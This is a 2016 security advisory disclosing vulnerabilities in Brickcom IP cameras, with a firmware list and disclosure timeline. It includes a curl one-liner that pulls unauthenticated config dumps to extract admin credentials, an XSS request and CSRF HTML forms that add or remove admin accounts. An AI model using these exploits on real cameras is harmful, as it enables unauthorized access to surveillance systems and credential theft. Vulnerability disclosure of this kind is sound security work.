_ _ _ _ | | | | | | ___ _ ____ _____| | | | __ _| |__ ___ / _ \| '__\ \ /\ / / _ \ | | |/ _` | '_ \/ __| | (_) | | \ V V / __/ | | | (_| | |_) \__ \ \___/|_| \_/\_/ \___|_|_|_|\__,_|_.__/|___/ Security Adivisory 2016-04-12 www.orwelllabs.com twt:@orwelllabs sm1thw@0rw3lll4bs:~/bb# ./Bruce.S [+] surveillance is the business model of the internet - OK! sm1thw@0rw3lll4bs:~/bb# echo $? 6079 Adivisory Information ===================== Vendor: Brickcom Corporation CVE-Number:N/A Adivisory-URL: http://www.orwelllabs.com/2016/04/Brickcom-Multiple-Vulnerabilities.html OLSA-ID: OLSA-2015-12-12 Impact: High (especially because some of these products are used in critical environments.) Remote: Yes p4n0pt1c0n I. Insecure Direct Object Reference/Authentication Bypass II. Sensitive information in plaintext III. Hard-coded Credentials IV. Cross-site scripting V. Basic Authentication VI. Cross-site Request Forgery Background ---------- Brickcom (calls itself) as a "leading network video manufacturer in the IP surveillance industry. Dedicated to providing the best IP surveillance solutions with a solid foundation for engineering quality network video equipment with a Research and Development Department that has been producing wireless broadband networking equipment for over twenty years." These products are used as video surveillance system by costumers and important sectors such as the Thai 4ir F0rce, as can be seen on the Vendor's web site. * notes: - some firmwares affected (item 'affected products' are very recent, having been launched a few months ago, and still vulnerable ... so this is an structural/legacy problem. - sensitive information presented in this advisory are fake. I. Insecure Direct Object Reference/Authentication Bypass --------------------------------------------------------- (+) affected scripts - configfile.dump - syslog.dump Path: Maintenance -> Configuration -> 'Export' + configfile.dump An unauthenticated GET request to the script "configfile.dump", as follows: http://xxx.xxx.xxx.xxx/configfile.dump?action=get or like this http://xxx.xxx.xxx.xxx/configfile.dump.backup http://xxx.xxx.xxx.xxx/configfile.dump.gz or just http://xxx.xxx.xxx.xxx/configfile.dump returns all camera settings [..code_snip..] DeviceBasicInfo.firmwareVersion=v3.0.6.12 DeviceBasicInfo.macAddress=00:00:00:00:00:00 DeviceBasicInfo.sensorID=OV9X11 DeviceBasicInfo.internalName=Brickcom DeviceBasicInfo.productName=Di-1092AX DeviceBasicInfo.displayName=CB-1092AX DeviceBasicInfo.modelNumber=XXX DeviceBasicInfo.companyName=Brickcom Corporation DeviceBasicInfo.comments=[CUBE HD IPCam STREEDM] DeviceBasicInfo.companyUrl=www.brickcom.com DeviceBasicInfo.serialNumber=AXNB02B211111 DeviceBasicInfo.skuType=LIT DeviceBasicInfo.ledIndicatorMode=1 DeviceBasicInfo.minorFW=1 DeviceBasicInfo.hardwareVersion= DeviceBasicInfo.PseudoPDseProdNum=P3301 AudioDeviceSetting.muted=0 [..code_snip..] and all credentials including the administrator account, like this: UserSetSetting.userList.size=2 UserSetSetting.userList.users0.index=0 UserSetSetting.userList.users0.password=MyM4st3rP4ss <<<--- admin pass UserSetSetting.userList.users0.privilege=1 UserSetSetting.userList.users0.username=Cam_User <<<--- admin user UserSetSetting.userList.users1.index=0 UserSetSetting.userList.users1.password=C0mm0mP4ss <<<--- (commom) user pass UserSetSetting.userList.users1.privilege=1 UserSetSetting.userList.users1.username=User_name <<<--- (commom) username UserSetSetting.userList.users2.index=0 UserSetSetting.userList.users2.password=[..code_snip..] [snip] BasicNetworkSetting.pppoe.password= <<<--- ppoe user BasicNetworkSetting.pppoe.username= <<<--- ppoe pass UPnPSetting.enabled=1 UPnPSetting.name=CB-102Ap-1ffc3 Brickcom.enabled=1 DDNSSetting.dyndnsEnabled=0 DDNSSetting.dyndns.wildcardEnabled=0 DDNSSetting.dyndns.username= <<<--- dyndns user DDNSSetting.dyndns.password= <<<--- dyndns password DDNSSetting.dyndns.hostname= DDNSSetting.tzodnsEnabled=0 DDNSSetting.tzodns.wildcardEnabled=0 DDNSSetting.tzodns.username= <<<--- and here... DDNSSetting.tzodns.password= <<<--- here.... DDNSSetting.tzodns.hostname= DDNSSetting.noipdnsEnabled=0 DDNSSetting.noipdns.wildcardEnabled=0 DDNSSetting.noipdns.username= <<<--- here DDNSSetting.noipdns.password= <<<--- here DDNSSetting.noipdns.hostname= and many others... - Path: System -> System Log -> 'Save to File' + syslog.dump - Request: (unauthenticated) GET http://xxx.xxx.xxx.xxx/syslog.dump?action=get - Response: [..code_snip..] LOG_NOTICE-WebServer :User '[admin]' logged in to [web server], Sat Mar 1 21:13:36 2014 LOG_NOTICE-WebServer :User '[admin]' logged in to [web server], Sat Mar 1 21:11:02 2014 [..code_snip..] Proof of Concept ````````````````` Online Bash exploit-p0c: curl -s -O http://xxx.xxx.xxx.xxx/configfile.dump && grep "users0" configfile.dump|awk '{ FS="."; } { print $4; }' || echo -e "[-] The target seems not be vulnerable, Mr. Robot! \n" IF target (xxx.xxx.xxx.xxx) is vulnerable the exploit will show a username, password and privilege level (1:admin), like this: password=4adm1niS3cr3tP4ss privilege=1 username=BrickcomADMIN and a configfile.dump with all credentials, settings, etc. will be recorded locally. IF not vulnerable, you'll see the message: "[-] The target seems not bet vulnerable, Mr. Robot!" II. sensitive information in plaintext -------------------------------------- As shown, there are countless cases where credentials and other sensitive information are store in plaintext. III. Hard-coded Credentials --------------------------- All credentials and other sensitive information can be found in html page user_management_config.html, Just viewing the html source code: view-source:http://{xxx.xxx.xxx.xxx}/user_management_config.html <script type="text/javascript"> var Edit_id=""; var userSet_size="5" var User_index=new Array(10); var User_username=new Array(10); var User_password=new Array(10); var User_privilege=new Array(10); User_index[0]="1"; User_username[0]="admin"; <<<---- User_password[0]="admin"; <<<---- User_privilege[0]="1"; User_index[1]="2"; User_username[1]="masteruser"; <<<---- User_password[1]="masterP4sss1*"; <<<---- User_privilege[1]="0"; IV. Cross-site scripting ------------------------ (+) Script: /cgi-bin/NotificationTest.cgi (+) Param: action= REQUEST: http://xxx.xxx.xxx.xxx/cgi-bin/NotificationTest.cgi?action=[ ** XSS **]&addressType=&hostname=h0stn4mE&ipAddress=xxx.xxx.xxxx.xxx&ipv6Address=&portNo=&accountName=brickcom&password=brickcom&ShareDIR= V. Basic Authentication ----------------------- The response asks the user to enter credentials for Basic HTTP authentication. If these are supplied, they will be submitted over clear-text HTTP (in Base64-encoded form). V. Cross-site Request Forgery ----------------------------- # To add an administrative credential: "brickcom:brickcom" > Privilege levels: - visor : 0 - admin : 1 - visor remoto : 2 <html> <!-- Brickcom FB-100Ae IP Box Camera- CSRF PoC --> <body> <form action="http://{xxx.xxx.xxx.xxx}/cgi-bin/users.cgi" method="POST"> <input type="hidden" name="action" value="add" /> <input type="hidden" name="index" value="0" /> <input type="hidden" name="username" value="brickcom" /> <input type="hidden" name="password" value="brickcom" /> <input type="hidden" name="privilege" value="1" /> <input type="submit" value="Submit form" /> </form> </body> </html> # to remove this credential: <html> <!-- Brickcom FB-100Ae IP Box Camera- CSRF PoC --> <body> <form action="http://{xxx.xxx.xxx.xxx}/cgi-bin/users.cgi" method="POST"> <input type="hidden" name="action" value="delete" /> <input type="hidden" name="username" value="brickcom" /> <input type="submit" value="Submit form" /> </form> </body> </html> affected products ----------------- (+) various products, including models: Brickcom FB-100Ae IP Box Camera - Firmware Version: v3.0.6.12 (release:09/08/2010 14:46) Brickcom WCB-100Ap Wireless Camera - Firmware Version: v3.0.6.26 (release:01/21/2011 18:31) Vandal Dome Cameras ------------------- Brickcom VD-202Ne Vandal Dome Camera - Firmware Version: v37019_Promise (release:2015-10-01_18:46:07) Brickcom VD-300Np Vandal Dome Camera - Firmware Version: v3.7.0.23T (release:2016-03-21_10:08:24) Brickcom VD-E200Nf Vandal Dome Camera - Firmware Version: v3.7.0.5T (release:2015-06-25_11:18:07) Bullet Cameras -------------- Brickcom OB-202Ne Bullet Camera - Firmware Version: v3.7.0.18R (release:2015-09-08_18:40:11) Brickcom OB-E200Nf Bullet Camera - Firmware Version: v3. (release:2015-10-16_11:36:46) Brickcom OB-200Np-LR Bullet Camera - Firmware Version: v3. (release:2015-10-15_11:30:46) Brickcom OB-500Ap Bullet Camera - Firmware Version: v3.7.0.1cR (release:2016-01-18_10:07:03) Brickcom GOB-300Np Bullet Camera (Unique Series) - Firmware Version: v3.7.0.17A (release: 2015-07-10_11:36:41) Brickcom OB-200Np-LR Bullet Camera (Unique Series) - Firmware Version: v3. (release: 2015-10-15_11:30:46) Mini Dome Camera ---------------- Brickcom MD-300Np Mini Dome Camera - Firmware Version: v3.2.2.8 (release:2013-08-01) Cube Camera ----------- Brickcom CB-102Ae V2 Cube Camera - Firmware Version: v3.0.6.12 (release: 09/07/2010 11:45) Fixed Dome Camera ----------------- Brickcom FD-202Ne Fixed Dome Camera - Firmware Version:v3.7.0.17R (release: 2015-08-19_18:47:31) Legal Notices +++++++++++++ The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information. Timeline ++++++++ 2015-03-20 - Issues discovered 2015-03-30 - attempt to contact Vendor 2015-12-12 - attempt to assign CVE 2016-04-12 - Not easy way to contact vendor, (ON Twitter) the last tweet was 2011-01-31... 2016-04-14 - Full disclosure About Orwelllabs ++++++++++++++++ Orwelllabs is a (doubleplusungood) security research lab interested in embedded device & webapp hacking && aims to create some intelligence around this vast and confusing picture that is the Internet of things. -----BEGIN PGP PUBLIC KEY BLOCK----- mQENBFcJl8wBCAC/J8rAQdOoC82gik6LVbH674HnxAAQ6rBdELkyR2S2g1zMIAFt xNN//A3bUWwFtlrfgiJkiOC86FimPus5O/c4iZc8klm07hxWuzoLPzBPM50+uGKH xZwwLa5PLuuR1T0O+OFqd9sdltz6djaYrFsdq6DZHVrp31P7LqHHRVwN8vzqWmSf 55hDGNTrjbnmfuAgQDrjA6FA2i6AWSTXEuDd5NjCN8jCorCczDeLXTY5HuJDb2GY U9H5kjbgX/n3/UvQpUOEQ5JgW1QoqidP8ZwsMcK5pCtr9Ocm+MWEN2tuRcQq3y5I SRuBk/FPhVVnx5ZrLveClCgefYdqqHi9owUTABEBAAG0IU9yd2VsbExhYnMgPG9y d2VsbGxhYnNAZ21haWwuY29tPokBOQQTAQgAIwUCVwmXzAIbAwcLCQgHAwIBBhUI AgkKCwQWAgMBAh4BAheAAAoJELs081R5pszAhGoIALxa6tCCUoQeksHfR5ixEHhA Zrx+i3ZopI2ZqQyxKwbnqXP87lagjSaZUk4/NkB/rWMe5ed4bHLROf0PAOYAQstE f5Nx2tjK7uKOw+SrnnFP08MGBQqJDu8rFmfjBsX2nIo2BgowfFC5XfDl+41cMy9n pVVK9qHDp9aBSd3gMc90nalSQTI/QwZ6ywvg+5/mG2iidSsePlfg5d+BzQoc6SpW LUTJY0RBS0Gsg88XihT58wnX3KhucxVx9RnhainuhH23tPdfPkuEDQqEM/hTVlmN 95rV1waD4+86IWG3Zvx79kbBnctD/e9KGvaeB47mvNPJ3L3r1/tT3AQE+Vv1q965 AQ0EVwmXzAEIAKgsUvquy3q8gZ6/t6J+VR7ed8QxZ7z7LauHvqajpipFV83PnVWf ulaAIazUyy1XWn80bVnQ227fOJj5VqscfnHqBvXnYNjGLCNMRix5kjD/gJ/0pm0U gqcrowSUFSJNTGk5b7Axdpz4ZyZFzXc33R4Wvkg/SAvLleU40S2wayCX+QpwxlMm tnBExzgetRyNN5XENATfr87CSuAaS/CGfpV5reSoX1uOkALaQjjM2ADkuUWDp6KK 6L90h8vFLUCs+++ITWU9TA1FZxqTl6n/OnyC0ufUmvI4hIuQV3nxwFnBj1Q/sxHc TbVSFcGqz2U8W9ka3sFuTQrkPIycfoOAbg0AEQEAAYkBHwQYAQgACQUCVwmXzAIb DAAKCRC7NPNUeabMwLE8B/91F99flUVEpHdvy632H6lt2WTrtPl4ELUy04jsKC30 MDnsfEjXDYMk1GCqmXwJnztwEnTP17YO8N7/EY4xTgpQxUwjlpah++51JfXO58Sf Os5lBcar8e82m1u7NaCN2EKGNEaNC1EbgUw78ylHU3B0Bb/frKQCEd60/Bkv0h4q FoPujMQr0anKWJCz5NILOShdeOWXIjBWxikhXFOUgsUBYgJjCh2b9SqwQ2UXjFsU I0gn7SsgP0uDV7spWv/ef90JYPpAQ4/tEK6ew8yYTJ/omudsGLt4vl565ArKcGwB C0O2PBppCrHnjzck1xxVdHZFyIgWiiAmRyV83CiOfg37 =IZYl -----END PGP PUBLIC KEY BLOCK-----